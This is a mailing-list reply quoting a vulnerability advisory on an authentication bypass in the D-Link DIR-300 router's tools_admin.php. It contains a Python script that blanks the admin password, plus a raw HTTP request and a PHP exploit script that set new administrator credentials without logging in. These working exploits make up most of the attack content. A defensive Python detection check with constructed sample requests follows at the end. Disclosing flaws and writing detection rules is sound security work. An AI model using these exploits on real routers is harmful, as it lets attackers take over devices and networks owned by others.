Re: D-Link DIR-300 authentication bypass
Using Python and Requests (must personalise router IP):
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
import requests

# Same form fields as in the advisory below; NO_NEED_AUTH=1 is what skips the login check.
# admin_password1 is left empty here, so the admin password is set to an empty string.
payload = {'ACTION_POST': 'LOGIN', 'LOGIN_USER': 'a', 'LOGIN_PASSWD': 'b',
           'login': '+Log+In+', 'NO_NEED_AUTH': '1', 'AUTH_GROUP': '0',
           'admin_name': 'admin', 'admin_password1': ''}
# Send the fields in the form-urlencoded POST body (data=), as in the advisory's request;
# params= would put them in the query string instead.
r = requests.post("http://192.168.0.1:80/tools_admin.php", data=payload)
print(r.status_code)
On Tuesday, 9 November 2010 at 10:05:12 UTC+1, Karol Celiński wrote:
> [intro]
> Hello, I found a security bug in the D-Link DIR-300 wireless router. It can
> be used to bypass the authentication mechanism by an attacker with access to the
> web interface. I reported it to D-Link but they are not replying to
> my emails. According to other D-Link security holes and their status I
> think that they won't reply, so I decided to write about it here.
>
> [Technical details]
>
> Control panel script - tools_admin.php allows an attacker to change the
> administrator name, password and other variables without any
> authorization by sending a specially crafted HTTP POST request such as:
>
> ---cut here---
> POST http://192.168.1.1:80/tools_admin.php HTTP/1.1
> Host: 192.168.1.2
> Keep-Alive: 115
> Content-Type: application/x-www-form-urlencoded
> Content-length: 0
>
> ACTION_POST=LOGIN&LOGIN_USER=a&LOGIN_PASSWD=b&login=+Log+In+&NO_NEED_AUTH=1&AUTH_GROUP=0&admin_name=admin&admin_password1=uhOHahEh
> ---cut here---
>
> If an attacker makes this request to the control panel, the
> administrator username is set to admin with password "uhOHahEh".
>
> [Affected]
>
> - All known D-Link DIR-300 firmware (i.e. 2.01B1, 1.04, 1.05).
> - There is a possibility that other D-Link devices which use the same PHP
> scripts in the control panel are affected. I'm not able to check it
> because I don't have devices for tests. I'm counting on you ;->
>
> [Code]
>
> ---cut here---
> <?php
> // Usage: php5 exploit.php <router ip> <port> <new admin password>
> if(sizeof($argv)!=4) {
>     echo "Usage: php5 $argv[0] <router ip address> <port> <admin password>\n";
>     exit;
> }
> $ch=curl_init();
> curl_setopt($ch, CURLOPT_URL, "http://".$argv[1]."/tools_admin.php");
> curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
> curl_setopt($ch, CURLOPT_PORT, (int)$argv[2]);
> curl_setopt($ch, CURLOPT_POST, 1);
> // Same form fields as the request above; NO_NEED_AUTH=1 skips the login check
> // and admin_name/admin_password1 set the new administrator credentials.
> curl_setopt($ch, CURLOPT_POSTFIELDS,
>     "ACTION_POST=LOGIN&LOGIN_USER=a&LOGIN_PASSWD=b&login=+Log+In+&NO_NEED_AUTH=1&AUTH_GROUP=0&admin_name=admin&admin_password1=".urlencode($argv[3]));
> echo "+ starting request\n";
> $out = curl_exec($ch);
> if($out===false) {
>     echo "- Error: could not connect (http://$argv[1]:$argv[2]/tools_admin.php).\n";
>     exit;
> } else
>     echo "+ request sent\n";
> curl_close($ch);
> // The router's response page contains "Successfully" when the settings were applied;
> // otherwise the full response is saved to answer.html for inspection.
> if(stripos($out,"Successfully")===false) {
>     echo "- something went wrong (check answer - answer.html)!\n";
>     $f=fopen("answer.html","w"); fwrite($f,$out); fclose($f);
>     exit;
> }
> else
>     echo "+ ok, now you can login using l: admin p:$argv[3]\n";
> ?>
> ---cut here---
>
> [History]
>
> - Information sent to vendor 07.08.2010
> - No response
> - Information resent to vendor 07.31.2010
> - No response from vendor
>
>
> [Credits]
> Karol Celiński ( Celin )
> Pentester/Researcher @ Safe Computing
>
> [Contact]
>=20
> karol at celin dot pl
>
> [Greetz]
> Tomasz Sawiak, Jacek Kowalski, Marcin Kozlowski, Robert Tomczykowski,
> Wojtek Machaj, Marek Zmyslowski, Szymon Sobczyk and all Safe Computing
> members.
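The bypass request described in the advisory, turned into a detection check. This is an added example, not code from the original post or the reply: a minimal HTTP request parser of my own plus a signature test that flags a POST to tools_admin.php carrying NO_NEED_AUTH=1 together with an admin credential field, whether the fields travel in the form body (the advisory's request) or in the query string (the Requests variant above). The sample requests are constructed for this example; the only names taken from the page are the script path and the form field names.

```python
#!/usr/bin/env python3
"""Flag HTTP requests that carry the DIR-300 tools_admin.php bypass fields.

Added example: a minimal request parser plus a signature check, not code from
the advisory or the reply. The sample requests below are constructed.
"""
from urllib.parse import parse_qs, urlsplit

BYPASS_PATH = "/tools_admin.php"                  # script named in the advisory
CRED_FIELDS = {"admin_name", "admin_password1"}   # fields the bypass overwrites


def parse_request(raw: str) -> dict:
    """Split a raw HTTP/1.x request into method, path, headers and form fields.

    Form fields are collected from both the query string and a urlencoded body,
    so the advisory's body variant and the reply's params= variant both match.
    """
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    # The advisory uses an absolute-form target (http://host:port/path);
    # urlsplit handles that and the plain origin-form (/path?query) alike.
    parts = urlsplit(target)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    # keep_blank_values so an empty admin_password1 (as in the reply) is kept
    fields = parse_qs(parts.query, keep_blank_values=True)
    if body.strip():
        fields.update(parse_qs(body.strip(), keep_blank_values=True))
    return {"method": method, "path": parts.path, "headers": headers, "fields": fields}


def is_bypass_attempt(raw: str) -> bool:
    """True for a POST to tools_admin.php with NO_NEED_AUTH=1 and a credential field."""
    req = parse_request(raw)
    if req["method"] != "POST" or not req["path"].endswith(BYPASS_PATH):
        return False
    fields = req["fields"]
    no_auth = fields.get("NO_NEED_AUTH", [""])[0] == "1"
    return no_auth and bool(CRED_FIELDS.intersection(fields))


# Constructed sample traffic: two bypass attempts and two benign requests.
BODY = ("ACTION_POST=LOGIN&LOGIN_USER=a&LOGIN_PASSWD=b&login=+Log+In+"
        "&NO_NEED_AUTH=1&AUTH_GROUP=0&admin_name=admin&admin_password1=uhOHahEh")

SAMPLE_REQUESTS = [
    # 1. The advisory's request: fields in a form-urlencoded body
    "POST http://192.168.1.1:80/tools_admin.php HTTP/1.1\r\nHost: 192.168.1.2\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n\r\n" + BODY,
    # 2. The reply's variant: same fields as a query string, empty password, no body
    "POST /tools_admin.php?ACTION_POST=LOGIN&LOGIN_USER=a&LOGIN_PASSWD=b"
    "&login=%2BLog%2BIn%2B&NO_NEED_AUTH=1&AUTH_GROUP=0&admin_name=admin"
    "&admin_password1= HTTP/1.1\r\nHost: 192.168.0.1\r\n\r\n",
    # 3. An ordinary login POST to the same script: no NO_NEED_AUTH, no credential change
    "POST /tools_admin.php HTTP/1.1\r\nHost: 192.168.0.1\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
    "ACTION_POST=LOGIN&LOGIN_USER=admin&LOGIN_PASSWD=s3cret&login=+Log+In+",
    # 4. Same field names but a GET to another script: not the bypass path
    "GET /index.php?NO_NEED_AUTH=1&admin_name=admin HTTP/1.1\r\nHost: 192.168.0.1\r\n\r\n",
]


def scan(requests_raw=SAMPLE_REQUESTS) -> list:
    """Return the 1-based indices of requests that look like the bypass."""
    return [i for i, raw in enumerate(requests_raw, 1) if is_bypass_attempt(raw)]


if __name__ == "__main__":
    for i, raw in enumerate(SAMPLE_REQUESTS, 1):
        print(f"request {i}: {'BYPASS' if is_bypass_attempt(raw) else 'ok'}")
```

The check keys on the combination of NO_NEED_AUTH=1 and a credential field rather than on the path alone, so the router's own legitimate login POSTs to tools_admin.php (sample 3) are not flagged; a proxy or IDS in front of the device is the natural place to run it, since the router itself gives no indication that the request was unauthenticated.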